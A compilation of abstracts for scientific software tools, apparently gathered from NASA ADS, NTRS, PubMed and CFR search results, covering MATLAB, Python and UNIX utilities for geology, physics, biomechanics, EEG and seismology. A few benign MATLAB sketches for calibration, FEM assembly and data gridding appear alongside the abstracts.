This Open-File report is a digital geologic map database. This pamphlet serves to introduce and describe the digital data. There are no paper maps included in the Open-File report. The report does include, however, PostScript plot files containing the images of the geologic map sheets with explanations, as well as the accompanying text describing the geology of the area. For those interested in a paper plot of information contained in the database or in obtaining the PostScript plot files, please see the section entitled 'For Those Who Aren't Familiar With Digital Geologic Map Databases' below. This digital map database, compiled from previously unpublished data, and new mapping by the authors, represents the general distribution of surficial deposits in the San Francisco bay region. Together with the accompanying text file (sf_geo.txt or sf_geo.pdf), it provides current information on Quaternary geology and liquefaction susceptibility of the San Francisco, California, 1:100,000 quadrangle. The database delineates map units that are identified by general age and lithology following the stratigraphic nomenclature of the U.S. Geological Survey. The scale of the source maps limits the spatial resolution (scale) of the database to 1:100,000 or smaller. The content and character of the database, as well as three methods of obtaining the database, are described below.
The automatic neutron guide optimizer guide_bot
NASA Astrophysics Data System (ADS)
Bertelsen, Mads
2017-09-01
The guide optimization software guide_bot is introduced, the main purpose of which is to reduce the time spent programming when performing numerical optimization of neutron guides. A limited amount of information on the overall guide geometry and a figure of merit describing the desired beam is used to generate the code necessary to solve the problem. A generated McStas instrument file performs the Monte Carlo ray-tracing, which is controlled by iFit optimization scripts. The resulting optimal guide is thoroughly characterized, both in terms of brilliance transfer from an idealized source and on a more realistic source such as the ESS Butterfly moderator. Basic MATLAB knowledge is required from the user, but no experience with McStas or iFit is necessary. This paper briefly describes how guide_bot is used and some important aspects of the code. A short validation against earlier work is performed which shows the expected agreement. In addition a scan over the vertical divergence requirement, where individual guide optimizations are performed for each corresponding figure of merit, provides valuable data on the consequences of this parameter. The guide_bot software package is best suited for the start of an instrument design project as it excels at comparing a large amount of different guide alternatives for a specific set of instrument requirements, but is still applicable in later stages as constraints can be used to optimize more specific guides.
A general UNIX interface for biocomputing and network information retrieval software.
Kiong, B K; Tan, T W
1993-10-01
We describe a UNIX program, HYBROW, which can integrate without modification a wide range of UNIX biocomputing and network information retrieval software. HYBROW works in conjunction with a separate set of ASCII files containing embedded hypertext-like links. The program operates like a hypertext browser featuring five basic links: file link, execute-only link, execute-display link, directory-browse link and field-filling link. Useful features of the interface may be developed using combinations of these links with simple shell scripts and examples of these are briefly described. The system manager who supports biocomputing users should find the program easy to maintain, and useful in assisting new and infrequent users; it is also simple to incorporate new programs. Moreover, the individual user can customize the interface, create dynamic menus, hypertext a document, invoke shell scripts and new programs simply with a basic understanding of the UNIX operating system and any text editor. This program was written in C language and uses the UNIX curses and termcap libraries. It is freely available as a tar compressed file (by anonymous FTP from nuscc.nus.sg).
ABM Drag_Pass Report Generator
NASA Technical Reports Server (NTRS)
Fisher, Forest; Gladden, Roy; Khanampornpan, Teerapat
2008-01-01
dragREPORT software was developed in parallel with abmREPORT, which is described in the preceding article. Both programs were built on the capabilities created during that process. This tool generates a drag_pass report that summarizes vital information from the MRO aerobraking drag_pass build process, both to facilitate sequence reviews and to provide a high-level summary of the sequence for mission management. The script extracts information from the ENV, SSF, FRF, SCMFmax, and OPTG files, presenting it in a single, easy-to-check report that provides the majority of parameters needed for cross-check and verification as part of the sequence review process. Prior to dragREPORT, all the needed information was spread across a number of different files, each in a different format. This software is a Perl script that extracts vital summarization information and build-process details from a number of source files into a single, concise report format used to aid the MPST sequence review process and to provide a high-level summary of the sequence for mission management reference. This software could be adapted for future aerobraking missions to provide similar reports, review aids, and summary information.
Wrapping Python around MODFLOW/MT3DMS based groundwater models
NASA Astrophysics Data System (ADS)
Post, V.
2008-12-01
Numerical models that simulate groundwater flow and solute transport require a great amount of input data that is often organized into different files. A large proportion of the input data consists of spatially-distributed model parameters. The model output consists of a variety of data, such as heads, fluxes and concentrations. Typically all files have different formats. Consequently, preparing input and managing output is a complex and error-prone task. Proprietary software tools are available that facilitate the preparation of input files and the analysis of model outcomes. The use of such software may be limited if it does not support all the features of the groundwater model or when the costs of such tools are prohibitive. Therefore a Python library was developed that contains routines to generate input files and process output files of MODFLOW/MT3DMS based models. The library is freely available and has an open structure so that the routines can be customized and linked into other scripts and libraries. The current set of functions supports the generation of input files for MODFLOW and MT3DMS, including the capability to read spatially-distributed input parameters (e.g. hydraulic conductivity) from PNG files. Both ASCII and binary output files can be read efficiently, allowing for visualization of, for example, solute concentration patterns in contour plots with superimposed flow vectors using matplotlib. Series of contour plots are then easily saved as an animation. The subroutines can also be used within scripts to calculate derived quantities such as the mass of a solute within a particular region of the model domain. Using Python as a wrapper around groundwater models provides an efficient and flexible way of processing input and output data, which is not constrained by the limitations of third-party products.
NASA Astrophysics Data System (ADS)
Butykai, A.; Domínguez-García, P.; Mor, F. M.; Gaál, R.; Forró, L.; Jeney, S.
2017-11-01
The present document is an update of the previously published MatLab code for the calibration of optical tweezers in the high-resolution detection of the Brownian motion of non-spherical probes [1]. In this instance, an alternative version of the original code, based on the same physical theory [2] but focused on automating the calibration of measurements using spherical probes, is outlined. The newly added code is useful for high-frequency microrheology studies, where the probe radius is known but the viscosity of the surrounding fluid may not be. This extended calibration methodology is automatic, without the need for a user interface. A code for calibration by means of thermal noise analysis [3] is also included; this is a method that can be applied when using viscoelastic fluids if the trap stiffness is previously estimated [4]. The new code can be executed in MatLab and in GNU Octave. Program Files doi:http://dx.doi.org/10.17632/s59f3gz729.1 Licensing provisions: GPLv3 Programming language: MatLab 2016a (MathWorks Inc.) and GNU Octave 4.0 Operating system: Linux and Windows. Supplementary material: A new document README.pdf includes basic running instructions for the new code. Journal reference of previous version: Computer Physics Communications, 196 (2015) 599 Does the new version supersede the previous version?: No. It adds alternative but compatible code while providing similar calibration factors. Nature of problem (approx. 50-250 words): The original code uses a MatLab-provided user interface, which is not available in GNU Octave, and cannot be used outside of proprietary software such as MatLab. Moreover, the calibration process for spherical probes needs an automatic method when large amounts of data are calibrated for microrheology. Solution method (approx. 50-250 words): The new code can be executed in the latest version of MatLab and in GNU Octave, a free and open-source alternative to MatLab. This code implements an automatic calibration process that only requires the input data to be specified in the main script. Additionally, we include a calibration method based on thermal noise statistics, which can be used with viscoelastic fluids if the trap stiffness is previously estimated. Reasons for the new version: This version extends the functionality of PFMCal to the particular case of spherical probes and unknown fluid viscosities. The extended code is automatic, works on different operating systems and is compatible with GNU Octave. Summary of revisions: The original MatLab program in the previous version, which is executed by PFMCal.m, is not changed. Here, we have added two additional main scripts named PFMCal_auto.m and PFMCal_histo.m, which implement automatic calculation of the calibration process and calibration through Boltzmann statistics, respectively. The process of calibration using this code for spherical beads is described in the README.pdf file provided in the new code submission. Here, we obtain different calibration factors, β (given in μm/V), according to [2], related to two statistical quantities: the mean-squared displacement (MSD), βMSD, and the velocity autocorrelation function (VAF), βVAF. Using that methodology, the trap stiffness, k, and the zero-shear viscosity of the fluid, η, can be calculated if the value of the particle's radius, a, is known beforehand.
For comparison, we include in the extended code the method of calibration using the corner frequency of the power-spectral density (PSD) [5], providing a calibration factor βPSD. In addition, with a prior estimate of the trap stiffness, along with the known value of the particle's radius, we can use thermal noise statistics to obtain calibration factors, β, according to the quadratic form of the optical potential, βE, and related to the Gaussian distribution of the bead's positions, βσ2. This method has been demonstrated to be applicable to the calibration of optical tweezers when using non-Newtonian viscoelastic polymeric liquids [4]. An example of the results using this calibration process is summarized in Table 1. Using the data provided in the new code submission, for water and acetone fluids, we calculate all the calibration factors by using the original PFMCal.m and by the new non-GUI codes PFMCal_auto.m and PFMCal_histo.m. Regarding the new code, PFMCal_auto.m returns η, k, βMSD, βVAF and βPSD, while PFMCal_histo.m provides βσ2 and βE. Table 1 shows how we obtain the expected viscosity of the two fluids at the measurement temperature and how the different methods provide good agreement between trap stiffnesses and calibration factors. Additional comments including Restrictions and Unusual features (approx. 50-250 words): The original code, PFMCal.m, runs under MatLab using the Statistics Toolbox. The extended code, PFMCal_auto.m and PFMCal_histo.m, can be executed without modification using MatLab or GNU Octave. The code has been tested on Linux and Windows operating systems.
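As a worked illustration of the Boltzmann-statistics (position-histogram) calibration mentioned above, the following self-contained MatLab/Octave sketch recovers a calibration factor from the variance of the detector signal, assuming the trap stiffness is already known. It is not part of PFMCal; the numbers and the synthetic signal are assumptions chosen only to make the example runnable.

% Equipartition/Boltzmann sketch: for a bead in a harmonic trap, k*<x^2> = kB*T,
% and with x = beta*V the calibration factor follows from the signal variance.
kB = 1.380649e-23;                         % Boltzmann constant [J/K]
T  = 298;  k = 5e-6;                       % temperature [K] and trap stiffness [N/m] (assumed)
betaTrue = 0.8;                            % [um/V], used only to synthesise a test signal
x = sqrt(kB*T/k)*randn(1e5,1);             % bead positions [m] with equipartition variance
V = (x*1e6)/betaTrue;                      % corresponding detector signal [V]
betaSigma2 = sqrt(kB*T./(k*var(V)))*1e6;   % recovered calibration factor [um/V], ~0.8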
MILAMIN 2 - Fast MATLAB FEM solver
NASA Astrophysics Data System (ADS)
Dabrowski, Marcin; Krotkiewski, Marcin; Schmid, Daniel W.
2013-04-01
MILAMIN is a free and efficient MATLAB-based two-dimensional FEM solver utilizing unstructured meshes [Dabrowski et al., G-cubed (2008)]. The code consists of steady-state thermal diffusion and incompressible Stokes flow solvers implemented in approximately 200 lines of native MATLAB code. The brevity makes the code easily customizable. An important quality of MILAMIN is speed - it can handle millions of nodes within minutes on one CPU core of a standard desktop computer, and is faster than many commercial solutions. The new MILAMIN 2 allows three-dimensional modeling. It is designed as a set of functional modules that can be used as building blocks for efficient FEM simulations using MATLAB. The utilities are largely implemented as native MATLAB functions. For performance-critical parts we use MUTILS - a suite of compiled MEX functions optimized for shared memory multi-core computers. The most important features of MILAMIN 2 are: 1. Modular approach to defining, tracking, and discretizing the geometry of the model 2. Interfaces to external mesh generators (e.g., Triangle, Fade2d, T3D) and mesh utilities (e.g., element type conversion, fast point location, boundary extraction) 3. Efficient computation of the stiffness matrix for a wide range of element types, anisotropic materials and three-dimensional problems 4. Fast global matrix assembly using a dedicated MEX function 5. Automatic integration rules 6. Flexible prescription (spatial, temporal, and field functions) and efficient application of Dirichlet, Neumann, and periodic boundary conditions 7. Treatment of transient and non-linear problems 8. Various iterative and multi-level solution strategies 9. Post-processing tools (e.g., numerical integration) 10. Visualization primitives using MATLAB and VTK export functions. We provide a large number of examples that show how to implement a custom FEM solver using the MILAMIN 2 framework. The examples are MATLAB scripts of increasing complexity that address a given technical topic (e.g., creating meshes, reordering nodes, applying boundary conditions), a given numerical topic (e.g., using various solution strategies, non-linear iterations), or that present a fully-developed solver designed to address a scientific topic (e.g., performing Stokes flow simulations in a synthetic porous medium). References: Dabrowski, M., M. Krotkiewski, and D. W. Schmid, MILAMIN: MATLAB-based finite element method solver for large problems, Geochem. Geophys. Geosyst., 9, Q04030, 2008.
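The fast matrix assembly highlighted above relies on collecting all element contributions as index/value triplets and calling sparse() once; the toy sketch below illustrates that general pattern in plain MATLAB. It is not the MILAMIN or MUTILS code, and the connectivity and element matrix are made up.

% Triplet-based global stiffness assembly for an assumed toy connectivity.
nel = 1e5;  nnodPerEl = 3;  ndof = nel + 2;
ELEM = [(1:nel)' (2:nel+1)' (3:nel+2)'];            % element-to-node connectivity (assumed)
Ke   = [2 -1 -1; -1 2 -1; -1 -1 2];                 % toy element matrix, identical per element
[i, j] = ndgrid(1:nnodPerEl, 1:nnodPerEl);
I = ELEM(:, i(:))';  J = ELEM(:, j(:))';            % 9 x nel global row/column indices
V = repmat(Ke(:), 1, nel);                          % matching element entries
K = sparse(I(:), J(:), V(:), ndof, ndof);           % duplicate entries are summed automatically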
OPTICON: Pro-Matlab software for large order controlled structure design
NASA Technical Reports Server (NTRS)
Peterson, Lee D.
1989-01-01
A software package for large order controlled structure design is described and demonstrated. The primary program, called OPTICAN, uses both Pro-Matlab M-file routines and selected compiled FORTRAN routines linked into the Pro-Matlab structure. The program accepts structural model information in the form of state-space matrices and performs three basic design functions on the model: (1) open loop analyses; (2) closed loop reduced order controller synthesis; and (3) closed loop stability and performance assessment. The current controller synthesis methods which were implemented in this software are based on the Generalized Linear Quadratic Gaussian theory of Bernstein. In particular, a reduced order Optimal Projection synthesis algorithm based on a homotopy solution method was successfully applied to an experimental truss structure using a 58-state dynamic model. These results are presented and discussed. Current plans to expand the practical size of the design model to several hundred states and the intention to interface Pro-Matlab to a supercomputing environment are discussed.
Liu, Yijin; Meirer, Florian; Williams, Phillip A.; Wang, Junyue; Andrews, Joy C.; Pianetta, Piero
2012-01-01
Transmission X-ray microscopy (TXM) has been well recognized as a powerful tool for non-destructive investigation of the three-dimensional inner structure of a sample with spatial resolution down to a few tens of nanometers, especially when combined with synchrotron radiation sources. Recent developments of this technique have presented a need for new tools for both system control and data analysis. Here a software package developed in MATLAB for script command generation and analysis of TXM data is presented. The first toolkit, the script generator, allows automating complex experimental tasks which involve up to several thousand motor movements. The second package was designed to accomplish computationally intense tasks such as data processing of mosaic and mosaic tomography datasets; dual-energy contrast imaging, where data are recorded above and below a specific X-ray absorption edge; and TXM X-ray absorption near-edge structure imaging datasets. Furthermore, analytical and iterative tomography reconstruction algorithms were implemented. The compiled software package is freely available. PMID:22338691
Computer Software Configuration Item-Specific Flight Software Image Transfer Script Generator
NASA Technical Reports Server (NTRS)
Bolen, Kenny; Greenlaw, Ronald
2010-01-01
A K-shell UNIX script enables the International Space Station (ISS) Flight Control Team (FCT) operators in NASA s Mission Control Center (MCC) in Houston to transfer an entire or partial computer software configuration item (CSCI) from a flight software compact disk (CD) to the onboard Portable Computer System (PCS). The tool is designed to read the content stored on a flight software CD and generate individual CSCI transfer scripts that are capable of transferring the flight software content in a given subdirectory on the CD to the scratch directory on the PCS. The flight control team can then transfer the flight software from the PCS scratch directory to the Electronically Erasable Programmable Read Only Memory (EEPROM) of an ISS Multiplexer/ Demultiplexer (MDM) via the Indirect File Transfer capability. The individual CSCI scripts and the CSCI Specific Flight Software Image Transfer Script Generator (CFITSG), when executed a second time, will remove all components from their original execution. The tool will identify errors in the transfer process and create logs of the transferred software for the purposes of configuration management.
Xu, Jingping; Lightsom, Fran; Noble, Marlene A.; Denham, Charles
2002-01-01
During the past several years, the sediment transport group in the Coastal and Marine Geology Program (CMGP) of the U.S. Geological Survey has made major revisions to its methodology of processing, analyzing, and maintaining the variety of oceanographic time-series data. First, CMGP completed the transition of its oceanographic time-series database to a self-documenting NetCDF (Rew et al., 1997) data format. Second, CMGP's oceanographic data variety and complexity have been greatly expanded from traditional 2-dimensional, single-point time-series measurements (e.g., electromagnetic current meters, transmissometers) to more advanced 3-dimensional and profiling time-series measurements, due to many new acquisitions of modern instruments such as the Acoustic Doppler Current Profiler (RDI, 1996), Acoustic Doppler Velocimeter, Pulse-Coherence Acoustic Doppler Profiler (SonTek, 2001), and Acoustic Backscatter Sensor (Aquatec). In order to accommodate the NetCDF format of data from the new instruments, a software package for processing, analyzing, and visualizing time-series oceanographic data was developed. It is named CMGTooL. The CMGTooL package contains two basic components: a user-friendly GUI for NetCDF file analysis, processing and manipulation; and a data analyzing program library. Most of the routines in the library are stand-alone programs suitable for batch processing. CMGTooL is written in the MATLAB computing language (The Mathworks, 1997), therefore users must have MATLAB installed on their computer in order to use this software package. In addition, MATLAB's Signal Processing Toolbox is also required by some of CMGTooL's routines. Like most MATLAB programs, all CMGTooL codes are compatible with different computing platforms including PC, MAC, and UNIX machines (Note: CMGTooL has been tested on different platforms that run MATLAB 5.2 (Release 10) or lower versions. Some of the commands related to MAC may not be compatible with later releases of MATLAB). The GUI and some of the library routines call low-level NetCDF file I/O, variable and attribute functions. These NetCDF-exclusive functions are supported by a MATLAB toolbox named NetCDF, created by Dr. Charles Denham. This toolbox has to be installed in order to use the CMGTooL GUI. The CMGTooL GUI calls several routines that were initially developed by others. The authors would like to acknowledge the following scientists for their ideas and codes: Dr. Rich Signell (USGS), Dr. Chris Sherwood (USGS), and Dr. Bob Beardsley (WHOI). Many special terms that carry special meanings in either MATLAB or the NetCDF Toolbox are used in this manual. Users are encouraged to read the documents of MATLAB and NetCDF for reference.
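For orientation, the same kind of NetCDF time-series file can also be read with the NetCDF functions built into current MATLAB releases, independently of the Denham toolbox described above; the file and variable names in this sketch are assumptions.

% Read and plot one variable from an assumed EPIC-style mooring file.
info = ncinfo('mooring_adcp.nc');            % inspect dimensions, variables and attributes
t = ncread('mooring_adcp.nc', 'time');       % time coordinate (units per the file attributes)
u = ncread('mooring_adcp.nc', 'u_1205');     % eastward velocity; EPIC variable code assumed
plot(t, u); xlabel('time'); ylabel('u');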
3-D Synthetic Microstructure Generation with Ellipsoid Particles
2016-09-27
The report's MATLAB scripts (Appendix A, Appendix B, and Appendix C) build the synthetic microstructure as 3-D matrices in which background voxels are 0 and particle voxels are 1. For each candidate ellipsoid, the index ranges spanning the particle are wrapped periodically with mod() (indices of 0 are mapped back to image_size), the corresponding sub-volume Itest = logical(I(ix,iy,iz)) is extracted, and the particle is inserted only if sum(Itest(I_ellipse)) == 0, i.e. it does not overlap any previously placed particle.
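A cleaned-up reconstruction of that wrapped-index placement logic is sketched below. It follows the variable names visible in the report fragment but uses assumed sizes and a spherical mask in place of the report's ellipsoids, so it is illustrative rather than the original script.

% Periodic placement of a particle of diameter diam centred at (x0,y0,z0) in a
% 3-D binary volume I (background = 0, particle = 1), with overlap rejection.
image_size = [128 128 128];
I = false(image_size);
diam = 11;  x0 = 5;  y0 = 120;  z0 = 64;              % assumed example particle
ix = mod((x0-floor(diam/2)):(x0+ceil(diam/2)-1), image_size(1));  ix(ix==0) = image_size(1);
iy = mod((y0-floor(diam/2)):(y0+ceil(diam/2)-1), image_size(2));  iy(iy==0) = image_size(2);
iz = mod((z0-floor(diam/2)):(z0+ceil(diam/2)-1), image_size(3));  iz(iz==0) = image_size(3);
Itest = I(ix,iy,iz);                                  % existing voxels in the candidate box
[X,Y,Z] = ndgrid(1:numel(ix), 1:numel(iy), 1:numel(iz));
c = (numel(ix)+1)/2;                                  % centre of the candidate box
I_sphere = (X-c).^2 + (Y-c).^2 + (Z-c).^2 <= (diam/2)^2;   % spherical stand-in for the ellipsoid
if sum(Itest(I_sphere)) == 0                          % no overlap with existing particles
    Itest(I_sphere) = true;
    I(ix,iy,iz) = Itest;                              % write back with periodic wrapping
end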
Demonstration of New OLAF Capabilities and Technologies
NASA Astrophysics Data System (ADS)
Kingston, C.; Palmer, E.; Stone, J.; Neese, C.; Mueller, B.
2017-06-01
Upgrades to the On-Line Archiving Facility (OLAF) PDS tool are leading to improved usability and additional functionality by integration of JavaScript web app frameworks. Also included is the capability to upload tabular data as CSV files.
2018-01-31
Report table-of-contents fragment; the recoverable section headings cover the language for SeBBAS, running the SeBBAS algorithm in MATLAB, input file error checking, and a 5-blade rotor system investigation.
Gro2mat: a package to efficiently read gromacs output in MATLAB.
Dien, Hung; Deane, Charlotte M; Knapp, Bernhard
2014-07-30
Molecular dynamics (MD) simulations are a state-of-the-art computational method used to investigate molecular interactions at atomic scale. Interaction processes out of experimental reach can be monitored using MD software, such as Gromacs. Here, we present the gro2mat package that allows fast and easy access to Gromacs output files from Matlab. Gro2mat enables direct parsing of the most common Gromacs output formats, including the binary xtc-format. No openly available Matlab parser currently exists for this format. The xtc reader is orders of magnitude faster than other available pdb/ascii workarounds. Gro2mat is especially useful for scientists with an interest in quick prototyping of new mathematical and statistical approaches for Gromacs trajectory analyses. © 2014 Wiley Periodicals, Inc.
17 CFR 232.11 - Definition of terms used in part 232.
Code of Federal Regulations, 2010 CFR
2010-04-01
..., PDF, and static graphic files. Such code may be in binary (machine language) or in script form... Act means the Trust Indenture Act of 1939. Unofficial PDF copy. The term unofficial PDF copy means an...
16 CFR 322.9 - Recordkeeping and compliance requirements.
Code of Federal Regulations, 2012 CFR
2012-01-01
... consumer files containing the names, phone numbers, dollar amounts paid, and descriptions of mortgage... scripts, training materials, commercial communications, or other marketing materials, including websites... all consumer complaints; and (iii) Ascertaining the number and nature of consumer complaints regarding...
16 CFR 322.9 - Recordkeeping and compliance requirements.
Code of Federal Regulations, 2011 CFR
2011-01-01
... consumer files containing the names, phone numbers, dollar amounts paid, and descriptions of mortgage... scripts, training materials, commercial communications, or other marketing materials, including websites... all consumer complaints; and (iii) Ascertaining the number and nature of consumer complaints regarding...
NASA Astrophysics Data System (ADS)
Mlawsky, E. T.; Louie, J. N.; Pohll, G.; Carlson, C. W.; Blakely, R. J.
2015-12-01
Understanding the potential availability of water resources in Eastern California aquifers is of critical importance to making water management policy decisions and determining best-use practices for California, as well as for downstream use in Nevada. Hydrologic well log data can provide valuable information on aquifer capacity, but are often proprietary or economically unfeasible to obtain in sufficient quantity. In the case of basin-fill aquifers, it is possible to make estimates of aquifer geometry and volume using geophysical surveys of gravity, constrained by additional geophysical and geological observations. We use terrestrial gravity data to model depth-to-basement about the Bridgeport, CA basin for application in preserving the Walker Lake biome. In constructing the model, we assess several hundred gravity observations, existing and newly collected. We regard these datasets as "bulk," as the data are compiled from multiple sources. Inconsistencies among datasets can result in "static offsets," or artificial bull's-eye contours, within the gradient. Amending suspect offsets requires the attention of the modeler; picking these offsets by hand can be a time-consuming process when modeling large-scale basin features. We develop a MATLAB script for interpolating the residual Bouguer anomaly about the basin using sparse observation points, and leveling offset points with a user-defined sensitivity. The script is also capable of plotting gravity profiles between any two endpoints within the map extent. The resulting anomaly map provides an efficient means of locating and removing static offsets in the data, while also providing a fast visual representation of a bulk dataset. Additionally, we obtain gridded basin gravity models with an open-source alternative to proprietary modeling tools.
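The gridding step described above can be illustrated with a few lines of plain MATLAB; the sketch below is not the authors' script, and the synthetic stations and anomaly values stand in for the compiled Bouguer observations.

% Interpolate sparse gravity observations onto a regular grid and contour them.
rng(1);
x = 1e4*rand(300,1);  y = 1e4*rand(300,1);            % station coordinates [m] (synthetic)
g = -30 + 8*exp(-((x-5e3).^2 + (y-5e3).^2)/(2*(2e3)^2)) + 0.3*randn(300,1);   % anomaly [mGal]
F = scatteredInterpolant(x, y, g, 'natural', 'none'); % natural-neighbour interpolation
[xg, yg] = meshgrid(0:250:1e4, 0:250:1e4);
gg = F(xg, yg);                                       % NaN outside the data hull
contourf(xg, yg, gg, 20); axis equal; colorbar;
title('Interpolated residual Bouguer anomaly (mGal)');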
NASA Astrophysics Data System (ADS)
2000-01-01
All the Letters to the Editor in this issue are in the same PostScript or PDF file. Contents Looking back on Physics Peter Gill Lecturer in Education, School of Education, King's College London, Franklin-Wilkins Building, Waterloo Road, London SE1 8WA
Delorme, Arnaud; Makeig, Scott
2004-03-15
We have developed a toolbox and graphic user interface, EEGLAB, running under the cross-platform MATLAB environment (The Mathworks, Inc.) for processing collections of single-trial and/or averaged EEG data of any number of channels. Available functions include EEG data, channel and event information importing, data visualization (scrolling, scalp map and dipole model plotting, plus multi-trial ERP-image plots), preprocessing (including artifact rejection, filtering, epoch selection, and averaging), independent component analysis (ICA) and time/frequency decompositions including channel and component cross-coherence supported by bootstrap statistical methods based on data resampling. EEGLAB functions are organized into three layers. Top-layer functions allow users to interact with the data through the graphic interface without needing to use MATLAB syntax. Menu options allow users to tune the behavior of EEGLAB to available memory. Middle-layer functions allow users to customize data processing using command history and interactive 'pop' functions. Experienced MATLAB users can use EEGLAB data structures and stand-alone signal processing functions to write custom and/or batch analysis scripts. Extensive function help and tutorial information are included. A 'plug-in' facility allows easy incorporation of new EEG modules into the main menu. EEGLAB is freely available (http://www.sccn.ucsd.edu/eeglab/) under the GNU public license for noncommercial use and open source development, together with sample data, user tutorial and extensive documentation.
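A minimal example of the batch-scripting layer described above might look like the following; the dataset file name is a placeholder, and the pop_* calls shown are standard EEGLAB functions, although exact options vary between releases, so treat this as a hedged sketch rather than a canonical pipeline.

% Batch-style EEGLAB processing of a single dataset (EEGLAB must be on the path).
EEG = pop_loadset('filename', 'subject01.set');      % import a saved dataset
EEG = pop_eegfilt(EEG, 1, 40);                       % band-pass filter 1-40 Hz
EEG = pop_runica(EEG, 'icatype', 'runica');          % independent component analysis
EEG = eeg_checkset(EEG);                             % verify dataset consistency
pop_saveset(EEG, 'filename', 'subject01_ica.set');   % save the processed dataset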
Generating optimal control simulations of musculoskeletal movement using OpenSim and MATLAB.
Lee, Leng-Feng; Umberger, Brian R
2016-01-01
Computer modeling, simulation and optimization are powerful tools that have seen increased use in biomechanics research. Dynamic optimizations can be categorized as either data-tracking or predictive problems. The data-tracking approach has been used extensively to address human movement problems of clinical relevance. The predictive approach also holds great promise, but has seen limited use in clinical applications. Enhanced software tools would facilitate the application of predictive musculoskeletal simulations to clinically-relevant research. The open-source software OpenSim provides tools for generating tracking simulations but not predictive simulations. However, OpenSim includes an extensive application programming interface that permits extending its capabilities with scripting languages such as MATLAB. In the work presented here, we combine the computational tools provided by MATLAB with the musculoskeletal modeling capabilities of OpenSim to create a framework for generating predictive simulations of musculoskeletal movement based on direct collocation optimal control techniques. In many cases, the direct collocation approach can be used to solve optimal control problems considerably faster than traditional shooting methods. Cyclical and discrete movement problems were solved using a simple 1 degree of freedom musculoskeletal model and a model of the human lower limb, respectively. The problems could be solved in reasonable amounts of time (several seconds to 1-2 hours) using the open-source IPOPT solver. The problems could also be solved using the fmincon solver that is included with MATLAB, but the computation times were excessively long for all but the smallest of problems. The performance advantage for IPOPT was derived primarily by exploiting sparsity in the constraints Jacobian. The framework presented here provides a powerful and flexible approach for generating optimal control simulations of musculoskeletal movement using OpenSim and MATLAB. This should allow researchers to more readily use predictive simulation as a tool to address clinical conditions that limit human mobility.
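To make the direct collocation idea concrete, the sketch below solves a much simpler problem than the musculoskeletal models above: a torque-driven pendulum swing-up transcribed with trapezoidal collocation and solved with MATLAB's fmincon. It is not the authors' OpenSim framework, and all values are assumptions.

% Trapezoidal direct collocation for a normalized pendulum swing-up (save as a function file).
function zopt = pendulumCollocation()
    N = 41;  T = 3;  h = T/(N-1);                    % collocation nodes, duration, step
    obj = @(z) h*sum(z(2*N+1:3*N).^2);               % effort-like cost on the control
    z0  = [linspace(0, pi, N)'; zeros(2*N, 1)];      % straight-line initial guess
    opts = optimoptions('fmincon', 'MaxFunctionEvaluations', 2e5);
    zopt = fmincon(obj, z0, [], [], [], [], [], [], @(z) defects(z, N, h), opts);
end

function [c, ceq] = defects(z, N, h)
    th = z(1:N);  om = z(N+1:2*N);  u = z(2*N+1:3*N);
    dth = om;  dom = u - sin(th);                    % normalized pendulum dynamics
    ceq = [th(2:end) - th(1:end-1) - h/2*(dth(2:end) + dth(1:end-1));   % trapezoidal
           om(2:end) - om(1:end-1) - h/2*(dom(2:end) + dom(1:end-1));   % defect constraints
           th(1); om(1); th(end) - pi; om(end)];     % start at rest, finish inverted at rest
    c = [];
end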
Generating optimal control simulations of musculoskeletal movement using OpenSim and MATLAB
Lee, Leng-Feng
2016-01-01
Computer modeling, simulation and optimization are powerful tools that have seen increased use in biomechanics research. Dynamic optimizations can be categorized as either data-tracking or predictive problems. The data-tracking approach has been used extensively to address human movement problems of clinical relevance. The predictive approach also holds great promise, but has seen limited use in clinical applications. Enhanced software tools would facilitate the application of predictive musculoskeletal simulations to clinically-relevant research. The open-source software OpenSim provides tools for generating tracking simulations but not predictive simulations. However, OpenSim includes an extensive application programming interface that permits extending its capabilities with scripting languages such as MATLAB. In the work presented here, we combine the computational tools provided by MATLAB with the musculoskeletal modeling capabilities of OpenSim to create a framework for generating predictive simulations of musculoskeletal movement based on direct collocation optimal control techniques. In many cases, the direct collocation approach can be used to solve optimal control problems considerably faster than traditional shooting methods. Cyclical and discrete movement problems were solved using a simple 1 degree of freedom musculoskeletal model and a model of the human lower limb, respectively. The problems could be solved in reasonable amounts of time (several seconds to 1–2 hours) using the open-source IPOPT solver. The problems could also be solved using the fmincon solver that is included with MATLAB, but the computation times were excessively long for all but the smallest of problems. The performance advantage for IPOPT was derived primarily by exploiting sparsity in the constraints Jacobian. The framework presented here provides a powerful and flexible approach for generating optimal control simulations of musculoskeletal movement using OpenSim and MATLAB. This should allow researchers to more readily use predictive simulation as a tool to address clinical conditions that limit human mobility. PMID:26835184
bioalcidae, samjs and vcffilterjs: object-oriented formatters and filters for bioinformatics files.
Lindenbaum, Pierre; Redon, Richard
2018-04-01
Reformatting and filtering bioinformatics files are common tasks for bioinformaticians. Standard Linux tools and specific programs are usually used to perform such tasks, but there is still a gap between using these tools and the programming interface of some existing libraries. In this study, we developed a set of tools, namely bioalcidae, samjs and vcffilterjs, that reformat or filter files using a JavaScript engine or a pure java expression, taking advantage of the java API for high-throughput sequencing data (htsjdk). https://github.com/lindenb/jvarkit. pierre.lindenbaum@univ-nantes.fr.
NASA Astrophysics Data System (ADS)
Yamagishi, Y.; Yanaka, H.; Tsuboi, S.
2009-12-01
We have developed a conversion tool for the data of seismic tomography into KML, called KML generator, and made it available on the web site (http://www.jamstec.go.jp/pacific21/google_earth). The KML generator enables us to display vertical and horizontal cross sections of a model on Google Earth in a three-dimensional manner, which is useful for understanding the Earth's interior. The previous generator accepts text files of grid-point data containing longitude, latitude, and seismic velocity anomaly; each data file contains the data for one depth. Metadata, such as the bibliographic reference, grid-point interval, and depth, are described in a separate information file. We did not allow users to upload their own tomographic models to the web application, because there was no standard format for representing tomographic models. Recently, the European seismology research project NERIES (Network of Research Infrastructures for European Seismology) has advocated that the data of seismic tomography should be standardized. They propose a new format based on JSON (JavaScript Object Notation), one of the common data-interchange formats, as a standard for tomography. This format consists of two parts: metadata and grid-point data values. The JSON format is well suited to handling and analyzing tomographic models, because the structure of the format is fully defined by JavaScript objects, so the elements are directly accessible by a script. In addition, JSON libraries exist for several programming languages. The International Federation of Digital Seismograph Networks (FDSN) adopted this format as an FDSN standard format for seismic tomographic models. There is a possibility that this format will be accepted not only by European seismologists but also as a world standard. Therefore we have improved our KML generator for seismic tomography to also accept data files in JSON format, and improved the web application of the generator so that JSON-formatted data files can be uploaded. Users can convert any tomographic model data to KML. The KML obtained through the new generator should provide an arena for comparing various tomographic models and other geophysical observations on Google Earth, which may act as a common platform for geoscience browsing.
